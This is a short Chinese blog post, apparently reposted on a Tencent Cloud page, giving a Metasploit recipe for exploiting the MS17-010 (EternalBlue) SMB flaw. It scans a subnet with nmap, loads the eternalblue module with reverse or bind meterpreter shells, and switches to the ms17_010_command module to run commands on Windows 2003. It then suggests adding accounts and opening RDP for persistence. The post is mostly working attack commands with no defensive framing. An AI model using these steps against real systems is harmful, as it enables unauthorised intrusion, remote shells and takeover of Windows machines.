MS17010漏洞利用姿势
大家好,又见面了,我是你们的朋友全栈君。
MSF
在msf中常规的17-010打法如下
扫描是否存在ms17-010漏洞,扫描方式很多如namp或者fscan或msf等
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --openMSF常规漏洞利用
msf > use exploit/windows/smb/ms17_010_eternalblue
目标出网时反向打:
msf > set payload windows/x64/meterpreter/reverse_tcp
目标不出网时正向打(如添加了路由):
msf > set payload windows/x64/meterpreter/bind_tcp目标为win2003
当目标为win2003时可能,虽然目标机器存在漏洞,但是可能会返回不了session
换一个打发,直接执行系统命令
msf5 > use auxiliary/admin/smb/ms17_010_command
msf5 > set command whoami
msf5 > set rhosts x.x.x.x
既然可以执行命令那就好办了~~可以添加账号、开启3389
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/130623.html原文链接:https://javaforall.cn
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年4月2,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
